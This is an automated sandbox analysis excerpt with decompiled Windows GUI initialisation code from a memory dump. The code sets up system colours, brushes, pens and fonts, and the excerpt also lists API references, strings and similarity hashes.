						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L74;
						}
						E00D1A9E6(_t448 + 0x98);
						_t337 = CreateSolidBrush( *(_t448 + 0x1c)); // executed
						E00D1A8DA(_t448, _t448 + 0x98, _t515, _t337);
						E00D1A9E6(_t448 + 0xd0);
						E00D1A8DA(_t448, _t448 + 0xd0, _t515, CreateSolidBrush( *(_t448 + 0x54)));
						E00D1A9E6(_t448 + 0xb8);
						E00D1A8DA(_t448, _t448 + 0xb8, _t515, CreateSolidBrush( *(_t448 + 0x7c)));
						E00D1A9E6(_t448 + 0xc0);
						E00D1A8DA(_t448, _t448 + 0xc0, _t515, CreateSolidBrush( *(_t448 + 0x80)));
						E00D1A9E6(_t448 + 0xa0);
						E00D1A8DA(_t448, _t448 + 0xa0, _t515, CreateSolidBrush( *(_t448 + 0x3c)));
						E00D1A9E6(_t448 + 0xb0);
						E00D1A8DA(_t448, _t448 + 0xb0, _t515, CreateSolidBrush( *(_t448 + 0x30)));
						E00D1A9E6(_t448 + 0xc8);
						E00D1A8DA(_t448, _t448 + 0xc8, _t515, CreateSolidBrush( *(_t448 + 0x6c)));
						E00D1A9E6(_t448 + 0xd8);
						_t358 = CreatePen(0, 1,  *0xf0d5b4); // executed
						E00D1A8DA(_t448, _t448 + 0xd8, _t515, _t358);
						E00D1A9E6(_t448 + 0xe0);
						E00D1A8DA(_t448, _t448 + 0xe0, _t515, CreatePen(0, 1,  *0xf0d5cc));
						E00D1A9E6(_t448 + 0xe8);
						E00D1A8DA(_t448, _t448 + 0xe8, _t515, CreatePen(0, 1,  *0xf0d5d0));
						_t539 = _t448 + 0xa8;
						__eflags = _t539;
						if(_t539 != 0) {
							__eflags =  *(_t539 + 4);
							if( *(_t539 + 4) != 0) {
								E00D1A9E6(_t539);
							}
						}
						__eflags =  *((intOrPtr*)(_t448 + 0x1ac)) - 8;
						if( *((intOrPtr*)(_t448 + 0x1ac)) <= 8) {
							__eflags = E00D32A91( *((intOrPtr*)(_t545 - 0x2c)));
							_t468 = 0 | __eflags != 0x00000000;
							if(__eflags == 0) {
								goto L74;
							} else {
								_t224 = _t545 - 0x18;
								 *_t224 =  *(_t545 - 0x18) & 0x00000000;
								__eflags =  *_t224;
								 *((intOrPtr*)(_t545 - 0x1c)) = 0xea00f4;
								 *(_t545 - 4) = 1;
								E00D1A8DA(_t448, _t545 - 0x1c, _t515, _t366);
								E00D1A8DA(_t448, _t539, _t515, CreatePatternBrush( *(_t545 - 0x18)));
								 *(_t545 - 4) = 0;
								 *((intOrPtr*)(_t545 - 0x1c)) = 0xea00f4;
								E00D1A062(_t545 - 0x1c);
							}
						} else {
							_t523 =  *((intOrPtr*)(_t545 - 0x14));
							_t449 =  *((intOrPtr*)(_t448 + 0x1e));
							 *(_t545 - 0x10) =  *(_t448 + 0x1d) & 0x000000ff;
							 *(_t545 - 0xd) =  *((intOrPtr*)(_t523 + 0x1c));
							asm("cdq");
							_t448 =  *(_t545 - 0x10);
							asm("cdq");
							asm("cdq");
							E00D1A8DA( *(_t545 - 0x10), _t523 + 0xa8, _t515, CreateSolidBrush((((( *(_t523 + 0x26) & 0x000000ff) - (_t449 & 0x000000ff) - _t515 >> 0x00000001) + _t449 & 0x000000ff) << 0x00000008 | (( *(_t523 + 0x25) & 0x000000ff) - ( *(_t545 - 0x10) & 0x000000ff) - _t515 >> 0x00000001) +  *(_t545 - 0x10) & 0x000000ff) << 0x00000008 | (( *(_t523 + 0x24) & 0x000000ff) - ( *(_t545 - 0xd) & 0x000000ff) - _t515 >> 0x00000001) +  *(_t545 - 0xd) & 0x000000ff));
						}
						E00D39F05();
						_t233 = _t545 - 4;
						 *_t233 =  *(_t545 - 4) | 0xffffffff;
						__eflags =  *_t233;
						 *0xf0ed90 = 1;
						_t372 = E00D1A178(_t448, _t545 - 0x30, _t515,  *_t233);
						0xe2149e();
						return _t372;
					} else {
						_t524 =  *((intOrPtr*)(_t518 + 8));
						_t526 =  *_t526;
						_t524 = _t524 != 0;
						if(_t524 != 0) {
							goto L61;
						} else {
							_t400 = E00D141C3(_t447, _t465, _t515,  *((intOrPtr*)(_t524 + 0x20)));
							__eflags = _t400;
							if(_t400 != 0) {
								_t465 = _t524;
								 *((intOrPtr*)( *_t524 + 0x3a4))();
							}
							continue;
						}
					}
					L85:
				}
				 *(_t545 - 4) = 0;
				 *((intOrPtr*)(_t545 - 0x468)) = 0xea0394;
				E00D1A062(_t545 - 0x468); // executed
				 *(_t545 - 4) =  *(_t545 - 4) | 0xffffffff;
				_t402 = E00D1A178(_t447, _t545 - 0x484, _t515,  *(_t545 - 4));
				0xe214b2();
				return _t402;
				goto L85;
			}

0x00d3347c
0x00d33486
0x00d3348b
0x00d33495
0x00d33496
0x00d334a3
0x00d334a6
0x00d334ac
0x00d334b2
0x00d334b8
0x00d334c4
0x00d334ca
0x00d334d0
0x00d334d2
0x00d334d4
0x00d334d9
0x00d334f4
0x00d334f6
0x00d334f6
0x00d334db
0x00d334db
0x00d334e1
0x00d334e3
0x00d334e5
0x00d334ea
0x00000000
0x00d334ec
0x00d334ec
0x00d334ec
0x00d334ea
0x00d334fe
0x00d33506
0x00d33516
0x00d33516
0x00d33518
0x00d33520
0x00d33530
0x00d33530
0x00d33532
0x00d3353a
0x00d3354a
0x00d3354a
0x00d3354c
0x00d33554
0x00d33564
0x00d33564
0x00d33566
0x00d3356e
0x00d3357e
0x00d3357e
0x00d33580
0x00d33588
0x00d33598
0x00d33598
0x00d3359a
0x00d335a2
0x00d335b2
0x00d335b2
0x00d335b4
0x00d335bc
0x00d335cc
0x00d335cc
0x00d335ce
0x00d335d6
0x00d335e6
0x00d335e6
0x00d335e8
0x00d335f0
0x00d33600
0x00d33600
0x00d33608
0x00d33615
0x00d33621
0x00d33637
0x00d33640
0x00d33649
0x00d33652
0x00d33655
0x00d3365a
0x00d33661
0x00d33664
0x00d33666
0x00d33666
0x00d33666
0x00d3365c
0x00d3365e
0x00d3365e
0x00d3366e
0x00d33670
0x00d33670
0x00d33678
0x00d33686
0x00d3368b
0x00d336ad
0x00d336b1
0x00d336d6
0x00d336d8
0x00d336da
0x00d336dd
0x00d336e6
0x00d336df
0x00d336df
0x00d336df
0x00d336ec
0x00d336b3
0x00d336bc
0x00d336be
0x00d336be
0x00d336b1
0x00d336ee
0x00d33701
0x00d33706
0x00d3370a
0x00d33710
0x00d33715
0x00d3371b
0x00d33722
0x00d3372e
0x00d33730
0x00d3373a
0x00d33746
0x00d33749
0x00d3374d
0x00d3374d
0x00d3375d
0x00d3376a
0x00d33774
0x00d3377e
0x00d33789
0x00d33792
0x00d337a2
0x00d337ad
0x00d337b6
0x00d337bd
0x00d337ca
0x00d337d2
0x00d337d7
0x00d337e7
0x00d337ec
0x00d337ef
0x00d337f5
0x00d33800
0x00d3380c
0x00d33812
0x00d33819
0x00d3381f
0x00d33824
0x00d3382b
0x00d3382e
0x00d3383a
0x00d3383e
0x00d33844
0x00d3384a
0x00d33852
0x00d33854
0x00d3385f
0x00d33867
0x00d33870
0x00d33879
0x00d33885
0x00d3388c
0x00d33893
0x00d338a6
0x00d338ae
0x00d338b6
0x00d338bd
0x00d338c3
0x00d338c3
0x00d3385f
0x00d338df
0x00d338e4
0x00d338f6
0x00d338fe
0x00d33903
0x00d33917
0x00d3391c
0x00d3391e
0x00d33923
0x00d33957
0x00d3392b
0x00d3392d
0x00d3392f
0x00d33989
0x00d33989
0x00d3398e
0x00d33996
0x00d3399b
0x00d3399d
0x00d339a8
0x00d339af
0x00d339b1
0x00d339be
0x00d339be
0x00d339be
0x00d339b3
0x00d339b5
0x00d339b7
0x00d339b9
0x00000000
0x00d339bb
0x00d339bb
0x00d339bb
0x00d339b9
0x00d339c2
0x00d339c8
0x00d339ca
0x00d339cc
0x00d339db
0x00d339db
0x00d339db
0x00d339ce
0x00d339d0
0x00d339d2
0x00d339d4
0x00000000
0x00d339d6
0x00d339d8
0x00d339d8
0x00d339d4
0x00d339dd
0x00d339e2
0x00d339e8
0x00d339ed
0x00d339fe
0x00d33a04
0x00d33a08
0x00d33a0b
0x00d33a0e
0x00d33a12
0x00d33a15
0x00d33a18
0x00d33a1c
0x00d33a1f
0x00d33a22
0x00d33a26
0x00d33a29
0x00d33a2c
0x00d33a30
0x00d33a33
0x00d33a36
0x00d33a3a
0x00d33a3d
0x00d33a44
0x00d33a4b
0x00d33a52
0x00d33a59
0x00d33a5c
0x00d33a60
0x00d33a63
0x00d33a6a
0x00d33a71
0x00d33a78
0x00d33a7f
0x00d33a86
0x00d33a90
0x00d33a9a
0x00d33aa4
0x00d33aae
0x00d33ab4
0x00d33ab6
0x00d33abd
0x00d33ac3
0x00d33ad2
0x00d33ad4
0x00d33adb
0x00d33ac5
0x00d33ac5
0x00d33ac8
0x00d33acb
0x00d33acb
0x00d33aea
0x00d33aed
0x00d33af1
0x00d33af4
0x00d33af6
0x00d33afb
0x00d33afd
0x00d33afd
0x00d33afd
0x00d33b04
0x00d33b08
0x00d33b0b
0x00d33b0d
0x00d33b12
0x00000000
0x00000000
0x00d33b16
0x00d33b1a
0x00d33b1d
0x00d33b1f
0x00d33b24
0x00000000
0x00000000
0x00d33b2e
0x00d33b3c
0x00d33b41
0x00d33b4e
0x00d33b5b
0x00d33b68
0x00d33b75
0x00d33b82
0x00d33b92
0x00d33b9f
0x00d33bac
0x00d33bb9
0x00d33bc6
0x00d33bd3
0x00d33be0
0x00d33bed
0x00d33c02
0x00d33c07
0x00d33c14
0x00d33c28
0x00d33c35
0x00d33c49
0x00d33c4e
0x00d33c54
0x00d33c56
0x00d33c58
0x00d33c5c
0x00d33c60
0x00d33c60
0x00d33c5c
0x00d33c65
0x00d33c6c
0x00d33cec
0x00d33cee
0x00d33cf3
0x00000000
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33d02
0x00d33d09
0x00d33d0d
0x00d33d1e
0x00d33d26
0x00d33d2a
0x00d33d2d
0x00d33d2d
0x00d33c6e
0x00d33c72
0x00d33c75
0x00d33c78
0x00d33c82
0x00d33c8b
0x00d33c92
0x00d33ca9
0x00d33cbe
0x00d33cd9
0x00d33cd9
0x00d33d32
0x00d33d37
0x00d33d37
0x00d33d37
0x00d33d3e
0x00d33d48
0x00d33d4d
0x00d33d52
0x00d33931
0x00d33931
0x00d33936
0x00d3393d
0x00d3393f
0x00000000
0x00d33941
0x00d33944
0x00d33949
0x00d3394b
0x00d3394f
0x00d33951
0x00d33951
0x00000000
0x00d3394b
0x00d3393f
0x00000000
0x00d3392f
0x00d33961
0x00d33965
0x00d3396f
0x00d33974
0x00d3397e
0x00d33983
0x00d33988
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00D33486

Part of subcall function 00D19FA4: __EH_prolog3.LIBCMT ref: 00D19FAB
Part of subcall function 00D19FA4: GetWindowDC.USER32(00000000,00000004,00D339ED,00000000), ref: 00D19FD7

GetDeviceCaps.GDI32(?,00000058), ref: 00D334A6
DeleteObject.GDI32(00000000), ref: 00D33516
DeleteObject.GDI32(00000000), ref: 00D33530
DeleteObject.GDI32(00000000), ref: 00D3354A
DeleteObject.GDI32(00000000), ref: 00D33564
DeleteObject.GDI32(00000000), ref: 00D3357E
DeleteObject.GDI32(00000000), ref: 00D33598
DeleteObject.GDI32(00000000), ref: 00D335B2
DeleteObject.GDI32(00000000), ref: 00D335CC
DeleteObject.GDI32(00000000), ref: 00D335E6
DeleteObject.GDI32(00000000), ref: 00D33600
_memset.LIBCMT ref: 00D33621
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00D33631
lstrcpyW.KERNEL32(?,?), ref: 00D33686
EnumFontFamiliesW.GDI32(?,00000000,00D32E22,Segoe UI), ref: 00D336AD
lstrcpyW.KERNEL32(?,Segoe UI), ref: 00D336BC
EnumFontFamiliesW.GDI32(?,00000000,00D32E22,Tahoma), ref: 00D336D6
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 00D336EC
CreateFontIndirectW.GDI32(?), ref: 00D336F8
CreateFontIndirectW.GDI32(?), ref: 00D33754
CreateFontIndirectW.GDI32(?), ref: 00D33799
CreateFontIndirectW.GDI32(?), ref: 00D337C1
CreateFontIndirectW.GDI32(?), ref: 00D337DE
GetSystemMetrics.USER32(00000048), ref: 00D337F9
lstrcpyW.KERNEL32(?,Marlett), ref: 00D3380C
CreateFontIndirectW.GDI32(?), ref: 00D33812
GetStockObject.GDI32(00000011), ref: 00D3383E
GetObjectW.GDI32(00000000,0000005C,?), ref: 00D3385B
lstrcpyW.KERNEL32(?,Arial), ref: 00D33893
CreateFontIndirectW.GDI32(?), ref: 00D33899
CreateFontIndirectW.GDI32(?), ref: 00D338B6
GetStockObject.GDI32(00000011), ref: 00D338CA
GetObjectW.GDI32(?,0000005C,?,00000000), ref: 00D338DF
CreateFontIndirectW.GDI32(?), ref: 00D338E9
CreateFontIndirectW.GDI32(?), ref: 00D3390A

Part of subcall function 00D33D53: __EH_prolog3_GS.LIBCMT ref: 00D33D5A
Part of subcall function 00D33D53: GetTextMetricsW.GDI32(?,?,00000006,00000000,00000054,00D33923,00000000), ref: 00D33D97
Part of subcall function 00D33D53: GetTextMetricsW.GDI32(?,?,?), ref: 00D33DD8

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Strings

Segoe UI, xrefs: 00D33696, 00D336B3
Arial, xrefs: 00D3387F
Marlett, xrefs: 00D33806
Tahoma, xrefs: 00D336C4, 00D336DF
MS Sans Serif, xrefs: 00D336E6

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceException@8H_prolog3InfoSystemThrowWindow_memset
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 93597958-1395034203
Opcode ID: cb20bf282a17645095ed93a3ac4328f8093a99fef8f91f4db85093fbf40af8d2
Instruction ID: 8d86bd877ef8ff724f255cbc512de54f0c39a8f5a17420dc1b46865d1f1f8301
Opcode Fuzzy Hash: cb20bf282a17645095ed93a3ac4328f8093a99fef8f91f4db85093fbf40af8d2
Instruction Fuzzy Hash: D5E15FB1900308AFDF21EBB4DD49BDEB7B8AF05300F044599E54AA7291DB749A88CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D3398F Relevance: 64.8, APIs: 43, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00D3398F(signed int __ecx, void* __edx) {
				signed int _t103;
				signed int _t105;
				long _t108;
				long _t109;
				long _t110;
				long _t111;
				long _t112;
				long _t113;
				long _t118;
				long _t129;
				struct HBRUSH__* _t130;
				struct HBRUSH__* _t131;
				struct HBRUSH__* _t133;
				struct HBRUSH__* _t135;
				struct HPEN__* _t156;
				void* _t170;
				long _t195;
				signed char _t197;
				void* _t235;
				intOrPtr _t240;
				void* _t253;
				void* _t259;
				struct HBRUSH__* _t265;
				struct HBRUSH__* _t267;
				struct HBRUSH__* _t269;

				_t235 = __edx;
				0xe214d0(0x24);
				_t196 = __ecx;
				 *((intOrPtr*)(_t259 - 0x14)) = __ecx;
				if(GetSysColor(0x16) != 0xffffff) {
					L3:
					_t103 = 0;
					__eflags = 0;
				} else {
					_t195 = GetSysColor(0xf);
					if(_t195 != 0) {
						goto L3;
					} else {
						_t103 = _t195 + 1;
					}
				}
				 *((intOrPtr*)(_t196 + 0x184)) = _t103;
				if(GetSysColor(0x15) != 0 || GetSysColor(0xf) != 0xffffff) {
					_t105 = 0;
					__eflags = 0;
				} else {
					_t105 = 1;
				}
				_push(0);
				 *((intOrPtr*)(_t196 + 0x188)) = _t105;
				E00D19FA4(_t259 - 0x30);
				 *(_t259 - 4) =  *(_t259 - 4) & 0x00000000;
				 *((intOrPtr*)(_t196 + 0x1ac)) = GetDeviceCaps( *(_t259 - 0x28), 0xc);
				_t108 = GetSysColor(0xf);
				 *(_t196 + 0x1c) = _t108;
				 *(_t196 + 0x54) = _t108;
				_t109 = GetSysColor(0x10);
				 *(_t196 + 0x20) = _t109;
				 *(_t196 + 0x58) = _t109;
				_t110 = GetSysColor(0x15);
				 *(_t196 + 0x30) = _t110;
				 *(_t196 + 0x60) = _t110;
				_t111 = GetSysColor(0x16);
				 *(_t196 + 0x34) = _t111;
				 *(_t196 + 0x64) = _t111;
				_t112 = GetSysColor(0x14);
				 *(_t196 + 0x24) = _t112;
				 *(_t196 + 0x5c) = _t112;
				_t113 = GetSysColor(0x12);
				 *(_t196 + 0x28) = _t113;
				 *(_t196 + 0x68) = _t113;
				 *((intOrPtr*)(_t196 + 0x38)) = GetSysColor(0x11);
				 *((intOrPtr*)(_t196 + 0x2c)) = GetSysColor(6);
				 *(_t196 + 0x3c) = GetSysColor(0xd);
				 *((intOrPtr*)(_t196 + 0x40)) = GetSysColor(0xe);
				_t118 = GetSysColor(5);
				 *(_t196 + 0x6c) = _t118;
				 *(_t196 + 0x50) = _t118;
				 *(_t196 + 0x70) = GetSysColor(8);
				 *((intOrPtr*)(_t196 + 0x74)) = GetSysColor(9);
				 *((intOrPtr*)(_t196 + 0x78)) = GetSysColor(7);
				 *(_t196 + 0x7c) = GetSysColor(2);
				 *(_t196 + 0x80) = GetSysColor(3);
				 *((intOrPtr*)(_t196 + 0x88)) = GetSysColor(0x1b);
				 *((intOrPtr*)(_t196 + 0x8c)) = GetSysColor(0x1c);
				 *((intOrPtr*)(_t196 + 0x90)) = GetSysColor(0xa);
				 *((intOrPtr*)(_t196 + 0x94)) = GetSysColor(0xb);
				 *((intOrPtr*)(_t196 + 0x84)) = GetSysColor(0x13);
				if( *((intOrPtr*)(_t196 + 0x184)) == 0) {
					_t129 = GetSysColor(0x1a);
					 *(_t196 + 0x48) = 0xff0000;
					 *(_t196 + 0x4c) = 0x800080;
				} else {
					_t129 =  *(_t196 + 0x70);
					 *(_t196 + 0x48) = _t129;
					 *(_t196 + 0x4c) = _t129;
				}
				 *(_t196 + 0x44) = _t129;
				_t130 = GetSysColorBrush(0x10);
				 *(_t196 + 0x14) = _t130;
				_t265 = _t130;
				_t201 = 0 | _t265 == 0x00000000;
				if(_t265 == 0) {
					L12:
					E00D0BD09(_t201);
				}
				_t131 = GetSysColorBrush(0x14);
				 *(_t196 + 0x10) = _t131;
				_t267 = _t131;
				_t201 = 0 | _t267 != 0x00000000;
				if(_t267 != 0) {
					goto L12;
				}
				_t133 = GetSysColorBrush(5);
				 *(_t196 + 0x18) = _t133;
				_t269 = _t133;
				_t201 = 0 | _t269 != 0x00000000;
				if(_t269 != 0) {
					goto L12;
				}
				_t243 = _t196 + 0x98;
				E00D1A9E6(_t196 + 0x98);
				_t135 = CreateSolidBrush( *(_t196 + 0x1c)); // executed
				E00D1A8DA(_t196, _t243, _t235, _t135);
				_t244 = _t196 + 0xd0;
				E00D1A9E6(_t196 + 0xd0);
				E00D1A8DA(_t196, _t244, _t235, CreateSolidBrush( *(_t196 + 0x54)));
				_t245 = _t196 + 0xb8;
				E00D1A9E6(_t196 + 0xb8);
				E00D1A8DA(_t196, _t245, _t235, CreateSolidBrush( *(_t196 + 0x7c)));
				_t246 = _t196 + 0xc0;
				E00D1A9E6(_t196 + 0xc0);
				E00D1A8DA(_t196, _t246, _t235, CreateSolidBrush( *(_t196 + 0x80)));
				_t247 = _t196 + 0xa0;
				E00D1A9E6(_t196 + 0xa0);
				E00D1A8DA(_t196, _t247, _t235, CreateSolidBrush( *(_t196 + 0x3c)));
				_t248 = _t196 + 0xb0;
				E00D1A9E6(_t196 + 0xb0);
				E00D1A8DA(_t196, _t248, _t235, CreateSolidBrush( *(_t196 + 0x30)));
				_t249 = _t196 + 0xc8;
				E00D1A9E6(_t196 + 0xc8);
				E00D1A8DA(_t196, _t249, _t235, CreateSolidBrush( *(_t196 + 0x6c)));
				_t250 = _t196 + 0xd8;
				E00D1A9E6(_t196 + 0xd8);
				_t156 = CreatePen(0, 1,  *0xf0d5b4); // executed
				E00D1A8DA(_t196, _t250, _t235, _t156);
				_t251 = _t196 + 0xe0;
				E00D1A9E6(_t196 + 0xe0);
				E00D1A8DA(_t196, _t251, _t235, CreatePen(0, 1,  *0xf0d5cc));
				_t252 = _t196 + 0xe8;
				E00D1A9E6(_t196 + 0xe8);
				E00D1A8DA(_t196, _t252, _t235, CreatePen(0, 1,  *0xf0d5d0));
				_t253 = _t196 + 0xa8;
				if(_t253 != 0 &&  *((intOrPtr*)(_t253 + 4)) != 0) {
					E00D1A9E6(_t253);
				}
				if( *((intOrPtr*)(_t196 + 0x1ac)) <= 8) {
					__eflags = E00D32A91( *((intOrPtr*)(_t259 - 0x2c)));
					_t201 = 0 | __eflags != 0x00000000;
					if(__eflags == 0) {
						goto L12;
					} else {
						_t89 = _t259 - 0x18;
						 *_t89 =  *(_t259 - 0x18) & 0x00000000;
						__eflags =  *_t89;
						 *((intOrPtr*)(_t259 - 0x1c)) = 0xea00f4;
						 *(_t259 - 4) = 1;
						E00D1A8DA(_t196, _t259 - 0x1c, _t235, _t164);
						E00D1A8DA(_t196, _t253, _t235, CreatePatternBrush( *(_t259 - 0x18)));
						 *(_t259 - 4) = 0;
						 *((intOrPtr*)(_t259 - 0x1c)) = 0xea00f4;
						E00D1A062(_t259 - 0x1c);
					}
				} else {
					_t240 =  *((intOrPtr*)(_t259 - 0x14));
					_t197 =  *((intOrPtr*)(_t196 + 0x1e));
					 *(_t259 - 0x10) =  *(_t196 + 0x1d) & 0x000000ff;
					 *(_t259 - 0xd) =  *((intOrPtr*)(_t240 + 0x1c));
					asm("cdq");
					_t196 =  *(_t259 - 0x10);
					asm("cdq");
					asm("cdq");
					E00D1A8DA(_t196, _t240 + 0xa8, _t235, CreateSolidBrush((((( *(_t240 + 0x26) & 0x000000ff) - (_t197 & 0x000000ff) - _t235 >> 0x00000001) + _t197 & 0x000000ff) << 0x00000008 | (( *(_t240 + 0x25) & 0x000000ff) - ( *(_t259 - 0x10) & 0x000000ff) - _t235 >> 0x00000001) + _t196 & 0x000000ff) << 0x00000008 | (( *(_t240 + 0x24) & 0x000000ff) - ( *(_t259 - 0xd) & 0x000000ff) - _t235 >> 0x00000001) +  *(_t259 - 0xd) & 0x000000ff));
				}
				E00D39F05();
				_t98 = _t259 - 4;
				 *(_t259 - 4) =  *(_t259 - 4) | 0xffffffff;
				 *0xf0ed90 = 1;
				_t170 = E00D1A178(_t196, _t259 - 0x30, _t235,  *_t98);
				0xe2149e();
				return _t170;
			}

0x00d3398f
0x00d33996
0x00d3399b
0x00d3399d
0x00d339b1
0x00d339be
0x00d339be
0x00d339be
0x00d339b3
0x00d339b5
0x00d339b9
0x00000000
0x00d339bb
0x00d339bb
0x00d339bb
0x00d339b9
0x00d339c2
0x00d339cc
0x00d339db
0x00d339db
0x00d339d6
0x00d339d8
0x00d339d8
0x00d339dd
0x00d339e2
0x00d339e8
0x00d339ed
0x00d339fe
0x00d33a04
0x00d33a08
0x00d33a0b
0x00d33a0e
0x00d33a12
0x00d33a15
0x00d33a18
0x00d33a1c
0x00d33a1f
0x00d33a22
0x00d33a26
0x00d33a29
0x00d33a2c
0x00d33a30
0x00d33a33
0x00d33a36
0x00d33a3a
0x00d33a3d
0x00d33a44
0x00d33a4b
0x00d33a52
0x00d33a59
0x00d33a5c
0x00d33a60
0x00d33a63
0x00d33a6a
0x00d33a71
0x00d33a78
0x00d33a7f
0x00d33a86
0x00d33a90
0x00d33a9a
0x00d33aa4
0x00d33aae
0x00d33abd
0x00d33ac3
0x00d33ad2
0x00d33ad4
0x00d33adb
0x00d33ac5
0x00d33ac5
0x00d33ac8
0x00d33acb
0x00d33acb
0x00d33aea
0x00d33aed
0x00d33af1
0x00d33af4
0x00d33af6
0x00d33afb
0x00d33afd
0x00d33afd
0x00d33afd
0x00d33b04
0x00d33b08
0x00d33b0b
0x00d33b0d
0x00d33b12
0x00000000
0x00000000
0x00d33b16
0x00d33b1a
0x00d33b1d
0x00d33b1f
0x00d33b24
0x00000000
0x00000000
0x00d33b26
0x00d33b2e
0x00d33b3c
0x00d33b41
0x00d33b46
0x00d33b4e
0x00d33b5b
0x00d33b60
0x00d33b68
0x00d33b75
0x00d33b7a
0x00d33b82
0x00d33b92
0x00d33b97
0x00d33b9f
0x00d33bac
0x00d33bb1
0x00d33bb9
0x00d33bc6
0x00d33bcb
0x00d33bd3
0x00d33be0
0x00d33be5
0x00d33bed
0x00d33c02
0x00d33c07
0x00d33c0c
0x00d33c14
0x00d33c28
0x00d33c2d
0x00d33c35
0x00d33c49
0x00d33c4e
0x00d33c56
0x00d33c60
0x00d33c60
0x00d33c6c
0x00d33cec
0x00d33cee
0x00d33cf3
0x00000000
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33cf9
0x00d33d02
0x00d33d09
0x00d33d0d
0x00d33d1e
0x00d33d26
0x00d33d2a
0x00d33d2d
0x00d33d2d
0x00d33c6e
0x00d33c72
0x00d33c75
0x00d33c78
0x00d33c82
0x00d33c8b
0x00d33c92
0x00d33ca9
0x00d33cbe
0x00d33cd9
0x00d33cd9
0x00d33d32
0x00d33d37
0x00d33d37
0x00d33d3e
0x00d33d48
0x00d33d4d
0x00d33d52

APIs

__EH_prolog3.LIBCMT ref: 00D33996
GetSysColor.USER32(00000016), ref: 00D339A8
GetSysColor.USER32(0000000F), ref: 00D339B5
GetSysColor.USER32(00000015), ref: 00D339C8
GetSysColor.USER32(0000000F), ref: 00D339D0
GetDeviceCaps.GDI32(?,0000000C), ref: 00D339F6
GetSysColor.USER32(0000000F), ref: 00D33A04
GetSysColor.USER32(00000010), ref: 00D33A0E
GetSysColor.USER32(00000015), ref: 00D33A18
GetSysColor.USER32(00000016), ref: 00D33A22
GetSysColor.USER32(00000014), ref: 00D33A2C
GetSysColor.USER32(00000012), ref: 00D33A36
GetSysColor.USER32(00000011), ref: 00D33A40
GetSysColor.USER32(00000006), ref: 00D33A47
GetSysColor.USER32(0000000D), ref: 00D33A4E
GetSysColor.USER32(0000000E), ref: 00D33A55
GetSysColor.USER32(00000005), ref: 00D33A5C
GetSysColor.USER32(00000008), ref: 00D33A66
GetSysColor.USER32(00000009), ref: 00D33A6D
GetSysColor.USER32(00000007), ref: 00D33A74
GetSysColor.USER32(00000002), ref: 00D33A7B
GetSysColor.USER32(00000003), ref: 00D33A82
GetSysColor.USER32(0000001B), ref: 00D33A8C
GetSysColor.USER32(0000001C), ref: 00D33A96
GetSysColor.USER32(0000000A), ref: 00D33AA0
GetSysColor.USER32(0000000B), ref: 00D33AAA
GetSysColor.USER32(00000013), ref: 00D33AB4
GetSysColor.USER32(0000001A), ref: 00D33AD2
GetSysColorBrush.USER32(00000010), ref: 00D33AED
GetSysColorBrush.USER32(00000014), ref: 00D33B04
GetSysColorBrush.USER32(00000005), ref: 00D33B16
CreateSolidBrush.GDI32(?), ref: 00D33B3C
CreateSolidBrush.GDI32(?), ref: 00D33B56
CreateSolidBrush.GDI32(?), ref: 00D33B70
CreateSolidBrush.GDI32(?), ref: 00D33B8D
CreateSolidBrush.GDI32(?), ref: 00D33BA7
CreateSolidBrush.GDI32(?), ref: 00D33BC1
CreateSolidBrush.GDI32(?), ref: 00D33BDB
CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C02
CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C23

Part of subcall function 00D1A9E6: DeleteObject.GDI32(00000000), ref: 00D1A9F5

CreatePen.GDI32(00000000,00000001,00000000), ref: 00D33C44
CreateSolidBrush.GDI32(?), ref: 00D33CCC
CreatePatternBrush.GDI32(00000000), ref: 00D33D15

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: eff4cc4c02553364b4297bc755ce487be9aa888d747edd64515b39176c68fe1f
Instruction ID: 703e786cbf9942b99339d69b85ae95a23a2c626254cdf3db4f6e17de33ec0051
